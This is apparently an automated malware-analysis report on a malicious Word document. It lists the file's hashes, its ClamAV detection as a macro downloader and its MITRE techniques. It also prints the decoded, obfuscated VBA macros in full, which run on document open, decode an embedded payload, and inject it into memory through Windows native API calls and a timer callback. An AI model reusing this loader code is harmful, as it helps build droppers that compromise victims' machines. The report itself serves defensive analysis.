Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1d63cfe0c0b6c802…

MALICIOUS

Office (OLE)

221.0 KB Created: 2018-03-07 15:14:00 Authoring application: Microsoft Office Word First seen: 2018-04-30
MD5: 5a15282d0a09ee8e8a3a743ae93572b7 SHA-1: 427ce46fb256c484f48dbd242e6a01e92cb1adc9 SHA-256: 1d63cfe0c0b6c80212aafef737fc63f63415634c74ac3159966f63c31c1a08d4
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to call Windows API functions like NtAllocateVirtualMemory, suggesting it's involved in memory manipulation for payload execution. While no direct download URL is present, the presence of macros and the ClamAV detection strongly indicate a downloader or dropper functionality, likely delivered via spearphishing.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    mindbending
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11022 bytes
SHA-256: c395e25878446520ad7925a0a4b255f2b9539c673015d9a028fae7a31680431e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
mindbending
reseat = 53 + 48
Pmt 0, reseat, 22617, 21108, 6
End Sub




Attribute VB_Name = "zalfaomega"
#If (89 - 31 + 342 + 49 - 112 + 363) > ((25 - 10 + 305) - (79 - 44 + 505) * 1) And ((43 - 24 + 9) - (55 - 51 + 24)) * 2 < (Win64) Then
Public Declare PtrSafe Function sandfish _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (dropsy As LongPtr, selfcounsel As LongPtr, ByVal crabs As LongPtr, equivocateByVal As LongPtr, brawn As LongPtr, ByVal sandgrouse As LongPtr) As LongPtr
#End If
#If (111 - 4 + 293 + 54 - 46 + 292) > ((103 - 4 + 221) - (127 - 82 + 495) * 1) And Not ((73 - 109 + 64) - (16 - 70 + 82)) * 2 < (Win64) Then
Public Declare Function sandfish _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (gatecrasher As Long, acetic As Long, ByVal busted As Long, absinthByVal As Long, bonhomme As Long, ByVal coziness As Long) As Long
#End If
Function askance(gobbledygook, sociability, sibilant)
Dim benevolent As Long
Dim overdraw As Byte
Dim immethodical As Long
Dim anarchism As Variant
Dim superiority As Long
Dim belligerence As Long
Dim masorah As Long
Dim groundshaker As String
Dim extreme As Long
Dim amentes As String
Dim divellicate As Long
benevolent = gobbledygook
extreme = sibilant
superiority = sociability
complicity = 49 + 55
Pmt 0, complicity, 5746, 21967, 5
immethodical = 100 - 112 + 11
figaor = annelid(ByVal immethodical, _
benevolent, _
superiority, extreme, _
masorah)
End Function
Function compelling()
Dim batching(255) As Byte
awakening = 40 - 6 + 31
For i = awakening To (45 - 112 + 158)
batching(awakening) = awakening - (3 - 126 + 188)
awakening = awakening + 1
If (127 - 121 + 85) < awakening Then
doces = tyrannize + 74 - 109 + 100
Exit For
End If
foreandaft = menacing + 88 - 37 + 14
Next
awakening = (80 - 79 + 47)
For i = awakening To (124 - 31 - 35)
batching(awakening) = awakening + (96 - 74 - 18)
awakening = awakening + 1
If (7 - 55 + 106) < awakening Then
lightfooted = clubbism + 115 - 40 - 10
Exit For
End If
montgomery = pou + 55 - 3 + 13
Next
awakening = (60 - 61 + 98)
For i = awakening To (97 - 66 + 92)
batching(awakening) = awakening - (34 - 22 + 59)
awakening = awakening + 1
butuminous = alopex + 77 - 60 + 48
If (83 - 51 + 91) < awakening Then
maliciousness = fetter + 42 - 103 + 126
Exit For
End If
tabetic = mortality + 41 - 95 + 119
Next
batching(113 - 16 - 50) = (108 - 86 + 41)
awakening = (90 - 77 + 30)
batching(awakening) = (76 - 22 + 8)
compelling = batching
End Function

Attribute VB_Name = "mirrors"
#If (89 - 31 + 342 + 49 - 112 + 363) > ((25 - 10 + 305) - (79 - 44 + 505) * 1) And ((43 - 24 + 9) - (55 - 51 + 24)) * 2 < (Win64) Then
Public Declare PtrSafe Function annelid _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal silverfooted As Any, ByVal aureola As Any, ByVal appetency As Any, ByVal beautify As Any, ByVal nephritis As Any) As LongPtr
Public Declare PtrSafe Function accumulative _
Lib "Shlwapi   " Alias _
"GetOverlappedResult" (ByVal flashlight As Any, introjection As Any, indicating As Any, bravissimo As Any) As LongPtr
#End If
#If (111 - 4 + 293 + 54 - 46 + 292) > ((103 - 4 + 221) - (127 - 82 + 495) * 1) And Not ((73 - 109 + 64) - (16 - 70 + 82)) * 2 < (Win64) Then
Public Declare Function annelid _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal barrister As Any, ByVal dental As Any, ByVal scumble As Any, ByVal lifework As Any, ByVal antitypic As Any) As Long
#End If
Function acquisitive(archilochus) As String
Dim hac As Long
Dim heckler(63) As Long
Dim telesm(6962) As Byte
Dim chelyabinsk As Long
Dim sj(63) As Long
Dim fascinatingly(63) As Long
Dim nonnitrogenous As Long
Dim foreplay As Long
prebend = 31 - 34 + 67
ferociousness = 105 - 79 + 4070
catholical = 76 - 76 + 255
Dim acetous() As Byte
slenderly = 119 - 110 + 65527
allometry = 114 - 87 + 16711653
justness = 102 - 64 + 65242
adhibenda = 71 - 50 + 262123
cheliceral = 63 - 54 + 247
Dim morning() As Byte
morning = VBA.StrConv(archilochus, 120 + 8)
calanthe = 35 + 39
Pmt 0, calanthe, 4180, 54584, 7
barley = 7840 + 3
civitas = vbKeyShift - 12
For paramountcy = 1 - 1 To barley * 1
srebend = 31 - 34 + 67
If paramountcy Mod 2 = 0 Then
morning(paramountcy) = morning(paramountcy) - civitas
End If
srebend = 31 - 34 + 67
If Not paramountcy Mod 2 = 0 Then
morning(paramountcy) = morning(paramountcy) - (civitas - 1)
End If
srebend = 31 - 34 + 67
Next paramountcy
counterproject = 57 + 50
Pmt 0, counterproject, 22479, 11461, 3
stonework = compelling
For foreplay = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
sj(foreplay) = cinclidae(foreplay, prebend, 54)
heckler(foreplay) = cinclidae(foreplay, ferociousness, 54)
fascinatingly(foreplay) = cinclidae(foreplay, adhibenda, 54)
Next foreplay
gueridon = 36 + 19
Pmt 0, gueridon, 24908, 49456, 3
acetous = morning
falseness = 37 - 82 + 49
chrestomathy = 21 + 14
Pmt 0, chrestomathy, 11179, 44323, 8
eelpout = 58 - 15 - 40
colonic = Rnd(275)
holcus = holcus
flesh = eelpout + 1
physostigmine = 83 - 60 - 21
For chelyabinsk = 0 To barley
elaeagnus = acetous(chelyabinsk)
celt = acetous(chelyabinsk + 2)
dismet = heckler(stonework(acetous(chelyabinsk + 1)))
arguer = sj(stonework(celt)) + stonework(acetous(chelyabinsk + eelpout))
nonnitrogenous = fascinatingly(stonework(elaeagnus)) + dismet + arguer
foreplay = cinclidae(nonnitrogenous, allometry, 46)
telesm(hac) = cinclidae(foreplay, slenderly, 36)
foreplay = cinclidae(nonnitrogenous, justness, 46)
telesm(hac + 1) = cinclidae(foreplay, cheliceral, 36)
telesm(hac + physostigmine) = cinclidae(nonnitrogenous, catholical, 46)
hac = hac + physostigmine + 1
chelyabinsk = chelyabinsk + 3
Next
acquisitive = telesm
End Function
Function cinclidae(ranger, perceptivity, molarity)
If molarity = 36 + (10 / 2 - 5) Then
cinclidae = ranger \ perceptivity
ElseIf molarity = 46 + (5 - 3) / 2 - 1 Then
cinclidae = ranger And perceptivity
ElseIf molarity = 54 + (56 / 7 - 4 * 2) Then
cinclidae = ranger * perceptivity
End If
End Function
Function drow(moose)
Dim tablespoon As Byte
Dim mergus As Long
Dim trounce As String
Dim courtier As Integer
#If (49 - 89 + 440 + 14 - 4 + 290) > ((88 - 71 + 303) - (30 - 111 + 621) * 1) And ((127 - 96 - 3) - (11 - 123 + 140)) * 2 < (Win64) Then
Dim carnassial As LongPtr
magic = 37 - 1 - 28
Dim illtempered As LongPtr
Dim perceptiveness As Variant
Dim bulwark As LongPtr
Dim noncontent As Byte
endlessness = VarPtr(carnassial)
pusillanimous = barranca(endlessness, VarPtr(moose) + (126 - 66 - 52), magic)
#End If
#If (101 - 48 + 347 + 97 - 12 + 215) > ((2 - 55 + 373) - (127 - 96 + 509) * 1) And Not ((115 - 29 - 58) - (52 - 100 + 76)) * 2 < (Win64) Then
Dim carnassial As Long
magic = 40 - 36 + 0
Dim illtempered As Long
Dim bulwark As Long
endlessness = VarPtr(carnassial)
pusillanimous = askance(endlessness, VarPtr(moose) + (11 - 91 + 88), magic)
#End If
deliberando = 67 - 103 + 35
illtempered = 88 - 84 - 4
tennis = 75 - 64 - 11
bulwark = 103 - 123 + 9967
nociceptive = 83 - 1 + 4014
sanitorium = 30 - 48 + 82
daily = sandfish(ByVal deliberando, _
illtempered, ByVal tennis, bulwark, ByVal nociceptive, _
ByVal sanitorium)
mom = askance(illtempered, carnassial, 36 - 54 + 5901)
marooned = 16 + 47
Pmt 0, marooned, 14222, 41082, 6
drow = illtempered
End Function
Function barranca(daredevil, eblis, reactionist)
Dim polycirrus As Long
Dim tong As Variant
Dim musics As LongPtr
Dim morganatic As LongPtr
Dim fervens As LongPtr
Dim agreeable As Byte
Dim disorienting As LongPtr
Dim paternoster As LongPtr
holcus = holcus
morganatic = daredevil
paternoster = reactionist
holcus = holcus
disorienting = eblis
unretracted = 41 + 50
Pmt 0, unretracted, 12687, 25901, 2
musics = 46 - 46 - 1
mirrons = annelid(ByVal musics, _
morganatic, _
disorienting, paternoster, _
fervens)
End Function


Attribute VB_Name = "milks"
#If (111 - 4 + 293 + 54 - 46 + 292) > ((103 - 4 + 221) - (127 - 82 + 495) * 1) And Not ((73 - 109 + 64) - (16 - 70 + 82)) * 2 < (Win64) Then
Public Declare Function sharpen _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (filtertipped As Any, ByVal tweedledum As Any, ByVal nycticorax As Any, ByVal longish As Any, ByVal ryukyuan As Any, ByVal noblest As Any, ByVal chairlift As Any) As Long
#End If
#If (89 - 31 + 342 + 49 - 112 + 363) > ((25 - 10 + 305) - (79 - 44 + 505) * 1) And ((43 - 24 + 9) - (55 - 51 + 24)) * 2 < (Win64) Then
Public Declare PtrSafe Function sharpen _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (customary As Any, ByVal scend As Any, ByVal abbess As Any, ByVal claytonia As Any, ByVal dropout As Any, ByVal anemonella As Any, ByVal balefire As Any) As Long
#End If
Sub mindbending()
Dim agurial As String
Dim cyanophyta As String
stilly.cacus.Value = Day(#12/5/2013#)
perithecium = contumely
Set barter = stilly.cacus.SelectedItem
viscaceae = 25 + 28
Pmt 0, viscaceae, 17135, 23775, 3
imaret = barter.Name
charabancs = 52 - 18 + 7810
blastoderm = Right(imaret, charabancs)
pilferer = acquisitive(blastoderm)
ditheism = 49 + 60
Pmt 0, ditheism, 35163, 14522, 8
#If (67 - 94 + 427 + 86 - 51 + 265) > ((33 - 79 + 366) - (48 - 102 + 594) * 1) And ((90 - 101 + 39) - (19 - 33 + 42)) * 2 < (Win64) Then
Dim southeastern As LongPtr
Dim antimagnetic As LongPtr
Dim grow As LongPtr
Dim cumulative As LongPtr
Dim hest As LongPtr
disheartened = 73 - 63 + 2054
#End If
#If (34 - 111 + 477 + 61 - 107 + 346) > ((74 - 56 + 302) - (105 - 17 + 452) * 1) And Not ((85 - 107 + 50) - (106 - 63 - 15)) * 2 < (Win64) Then
Dim ompredre As Byte
Dim antimagnetic As Long
Dim incurvity As String
Dim southeastern As Long
Dim grow As Long
delinquent = 1 - 115 + 895
Dim cumulative As Long
Dim hest As Long
disheartened = delinquent + 3459
#End If
bellis = 11 - 43 + 32
jacent = 15 - 103 + 4184
caution = 26 + 32
Pmt 0, caution, 38049, 28115, 3
moulins = burr
amplify = 60 + 39
Pmt 0, amplify, 23855, 57779, 5
airing = pilferer
sinkhole = conjectural
southeastern = drow(airing)
grow = 2 - 102 + 100
antimagnetic = southeastern + disheartened
cumulative = 60 - 109 + 201576
hest = 82 - 82 + 3500
apocynaceae = sharpen(cumulative, _
grow, antimagnetic, _
grow, grow, _
grow, grow)
messy = 32 + 57
Pmt 0, messy, 37214, 39019, 5
End Sub

Attribute VB_Name = "stilly"
Attribute VB_Base = "0{C5842C56-1776-4E93-BE81-EFB8294FD229}{47DFE7E7-DAE3-409A-98F4-B37A35982B88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False